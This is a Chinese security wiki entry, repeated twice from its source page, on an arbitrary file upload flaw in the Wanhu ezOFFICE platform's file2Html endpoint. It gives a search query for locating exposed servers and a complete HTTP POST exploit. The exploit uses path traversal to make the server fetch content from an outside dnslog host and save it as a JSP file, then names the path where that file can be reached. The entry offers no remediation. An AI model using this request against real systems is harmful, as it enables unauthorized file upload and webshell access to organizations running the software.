fofamini-wiki

登录白背景

源码

万户协同办公平台 file2Html存在任意文件上传漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台 file2Html存在任意文件上传漏洞

二、影响版本

万户ezoffice

三、资产测绘

hunterapp.name="万户 Ezoffice OA"
登录页面

四、漏洞复现

POST /defaultroot/yzConvertFile/file2Html.controller HTTP/1.1
Host: 
User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

fileName=qwe.jsp&path=../platform/portal/&url=http://9ai9zw.dnslog.cn

/defaultroot/platform/portal/com/qwe.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/xqwqf2g8iu4by8gb

# 万户协同办公平台 file2Html存在任意文件上传漏洞

# 一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台 file2Html存在任意文件上传漏洞

# 二、影响版本
+ 万户ezoffice

# 三、资产测绘
+ hunter`app.name="万户 Ezoffice OA"`
+ 登录页面

![1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f.png](./img/PQuNyRUZ2iAn9nmw/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f-427685.png)

# 四、漏洞复现
```plain
POST /defaultroot/yzConvertFile/file2Html.controller HTTP/1.1
Host: 
User-Agent: Moziilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/116.0.0.0 Safari/537.36
Connection: close
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

fileName=qwe.jsp&path=../platform/portal/&url=http://9ai9zw.dnslog.cn
```

![1711874519039-4a3904fe-8c3c-4d8b-b8ad-616868da52e5.png](./img/PQuNyRUZ2iAn9nmw/1711874519039-4a3904fe-8c3c-4d8b-b8ad-616868da52e5-064289.png)

![1711874528672-b2ef6c74-91b6-44e6-a6d5-0d8060d806d6.png](./img/PQuNyRUZ2iAn9nmw/1711874528672-b2ef6c74-91b6-44e6-a6d5-0d8060d806d6-663849.png)

```plain
/defaultroot/platform/portal/com/qwe.jsp
```

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xqwqf2g8iu4by8gb>

fofamini-wiki

万户协同办公平台 file2Html存在任意文件上传漏洞

一、漏洞简介

<font style="color:rgb(62, 62, 62);">二、影响版本</font>

<font style="color:rgb(62, 62, 62);">三、资产测绘</font>

<font style="color:rgb(62, 62, 62);">四、漏洞复现</font>